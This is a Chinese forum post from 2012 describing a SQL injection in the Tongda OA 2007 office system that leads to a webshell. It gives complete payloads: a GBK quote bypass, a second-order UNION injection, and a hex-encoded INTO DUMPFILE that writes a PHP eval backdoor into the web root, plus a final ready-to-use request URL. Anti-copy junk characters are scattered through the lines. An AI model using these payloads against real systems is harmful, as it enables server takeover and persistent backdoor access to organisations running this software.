找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2389|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本+ D4 _( p) y; i  x" t* L
* E6 H: ~* k$ h! z
) e! v6 P. z" I9 F& w1 ~2 X
Office Anywhere 2007 网络智能办公系统$ o' [  J; X6 J/ z

2 m1 A, {1 ^0 b% P( ahttp://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
3 U- t. S2 T( m# V - x# x, x4 B5 X- o  t, B
% Z  K: w' ]' D$ Q
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的+ `. K! z! A& {+ Y4 v) G2 |

+ X  |. S7 Y  g8 l$ Y) F例如:SELECT * from USER where USER_ID='{$USERNAME}'  
' m* h- ]0 `  ^4 R( E7 Y其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了3 x1 A5 D/ S' D: T) L- \3 f  h4 R

  c5 E+ K( e$ [" o! T# O这个时候我们是不是可以组合起来使用哪?
% O8 O+ h  |& a8 w9 \
! m1 E6 u0 G  M) o: h5 B( I第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
# k, G/ h, l3 Tunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
3 F  ?- }: Q1 R' ^4 L- e( I; u
+ V  j3 K+ C! ]+ m+ a这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了4 X7 z8 @" K6 {# P6 }3 }% N; H2 t

( k4 @7 D2 N4 J% A1 V8 b那么问题来了,单引号可以吗?当然是不可以的,^_^。。。' q, h$ c. j- @
, H2 I8 L+ @* [. q: P) [
那么我们用字符串格式带入进行hex编码% E* q9 c6 E3 ]
& _7 E4 V) v, a7 ^# k
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%232 B/ a9 b2 h7 R6 t/ ~
' B& d; A1 R5 ~% |0 Y% v
测试ok,获取oa的webshell+ A7 [  J7 z8 W- e  u3 P9 Q4 c
" f" i& E7 N& ]" n8 k- d: t
" f, S8 Q: |( t/ M0 W
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%236 R" u: q+ X+ R( s, }! g9 u
直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表